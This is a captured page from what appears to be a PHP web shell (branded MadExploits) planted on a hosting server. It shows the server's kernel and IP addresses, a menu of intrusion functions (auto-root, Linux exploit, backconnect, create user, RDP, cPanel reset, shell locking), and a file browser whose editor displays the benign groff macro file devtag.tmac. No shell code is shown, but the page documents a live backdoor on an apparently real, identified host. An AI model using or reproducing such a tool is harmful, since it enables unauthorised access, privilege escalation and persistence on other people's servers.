Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.145.34.51
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
groff /
1.22.2 /
tmac /
[ HOME SHELL ]
Name
Size
Permission
Action
mdoc
[ DIR ]
drwxr-xr-x
an-ext.tmac
3.42
KB
-rw-r--r--
an-old.tmac
13.99
KB
-rw-r--r--
an.tmac
35
B
-rw-r--r--
andoc.tmac
1.82
KB
-rw-r--r--
composite.tmac
537
B
-rw-r--r--
cp1047.tmac
2.12
KB
-rw-r--r--
cs.tmac
4.46
KB
-rw-r--r--
de.tmac
4.49
KB
-rw-r--r--
den.tmac
1016
B
-rw-r--r--
devtag.tmac
3.69
KB
-rw-r--r--
doc-old.tmac
35.44
KB
-rw-r--r--
doc.tmac
72.08
KB
-rw-r--r--
eqnrc
1.37
KB
-rw-r--r--
europs.tmac
1.63
KB
-rw-r--r--
fallbacks.tmac
1.33
KB
-rw-r--r--
fr.tmac
5.17
KB
-rw-r--r--
html-end.tmac
418
B
-rw-r--r--
html.tmac
16.02
KB
-rw-r--r--
hyphen.cs
20.73
KB
-rw-r--r--
hyphen.den
37.47
KB
-rw-r--r--
hyphen.det
36.43
KB
-rw-r--r--
hyphen.fr
27.35
KB
-rw-r--r--
hyphen.sv
33.77
KB
-rw-r--r--
hyphen.us
27.21
KB
-rw-r--r--
hyphenex.cs
291
B
-rw-r--r--
hyphenex.det
118.13
KB
-rw-r--r--
hyphenex.us
15.31
KB
-rw-r--r--
ja.tmac
1.66
KB
-rw-r--r--
latin1.tmac
2.2
KB
-rw-r--r--
latin2.tmac
2.29
KB
-rw-r--r--
latin5.tmac
2.2
KB
-rw-r--r--
latin9.tmac
2.2
KB
-rw-r--r--
man.tmac
36
B
-rw-r--r--
mandoc.tmac
39
B
-rw-r--r--
mdoc.tmac
35
B
-rw-r--r--
papersize.tmac
3.97
KB
-rw-r--r--
pic.tmac
117
B
-rw-r--r--
ps.tmac
20.07
KB
-rw-r--r--
psatk.tmac
1.05
KB
-rw-r--r--
psold.tmac
1.76
KB
-rw-r--r--
pspic.tmac
4.62
KB
-rw-r--r--
safer.tmac
196
B
-rw-r--r--
sv.tmac
4.04
KB
-rw-r--r--
trans.tmac
4.44
KB
-rw-r--r--
troffrc
1.35
KB
-rw-r--r--
troffrc-end
1.12
KB
-rw-r--r--
tty-char.tmac
5.06
KB
-rw-r--r--
tty.tmac
1.52
KB
-rw-r--r--
unicode.tmac
71
B
-rw-r--r--
www.tmac
39.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : devtag.tmac
.ig devtag.tmac - macro package for adding tags to roff documents. File position: <groff_source_top>/tmac/devtag.tmac Installed position: groff's main macro directory. ------------------------------------------------------------------------ Legalese ------------------------------------------------------------------------ This file is part of groff, the GNU roff type-setting system. Copyright (C) 2004, 2009, 2010 Free Software Foundation, Inc. written by Gaius Mulley <gaius@glam.ac.uk>. groff is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. groff is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ------------------------------------------------------------------------ Description ------------------------------------------------------------------------ A simple set of macros to provide markup devices (currently only grohtml) with tags that define the meaning of the formatted text and also basic formatting instructions. It generalizes the tag concept used within grohtml and in the future it is hoped that more markup based devices can capitalize on this work. It also clearly defines those tags which are honoured by grohtml. Note that not all tags are included here. Some of the grohtml specific tags (header specific and jobname, etc.) are called directly from within www.tmac. The tags defined here are reasonably generic and could be applied to other devices. .. . .do if d DEVTAG-NH .nx . .nr _C \n(.C .cp 0 . .\" -------------------------------------------------------------------- .\" DEVTAG <name> .\" .\" Emit a tag <name> .\" .de DEVTAG . tag devtag:\\$* .. .\" -------------------------------------------------------------------- .\" DEVTAG-NEXT <name> .\" .\" When the troff state changes, emit tag <name> .\" .de DEVTAG-NEXT . taga devtag:\\$* .. . .\" -------------------------------------------------------------------- .\" SH <level> .\" NH <level> .\" tell device we are starting a numbered heading .\" Takes a single parameter <level>. <level> 1 .\" is the outer most level. . .de DEVTAG-NH . DEVTAG ".NH \\$1" .. .als DEVTAG-SH DEVTAG-NH . .\" -------------------------------------------------------------------- .\" COL <n> .\" indicate that the following text is aligned for the column <n> .\" n: [1..MAX(n)] . .de DEVTAG-COL . DEVTAG ".col \\$1" .. . .\" -------------------------------------------------------------------- .\" EO-H .\" indicate that a header has finished. . .de DEVTAG-EO-H . DEVTAG ".eo.h" .. .\" -------------------------------------------------------------------- .\" EO-TL .\" indicate that a title has finished. . .de DEVTAG-EO-TL . DEVTAG ".eo.tl" .. .\" -------------------------------------------------------------------- .\" TL .\" indicate that the following text forms a title. . .de DEVTAG-TL . DEVTAG ".tl" .. . .\" -------------------------------------------------------------------- .\" COL-NEXT <n> .\" emit a column tag just before the next glyph. . .de DEVTAG-COL-NEXT . DEVTAG-NEXT ".col \\$1" .. . . .cp \n[_C] . . .\" -------------------------------------------------------------------- .\" Emacs settings .\" -------------------------------------------------------------------- . .\" Local Variables: .\" mode: nroff .\" End: .\" EOF
Close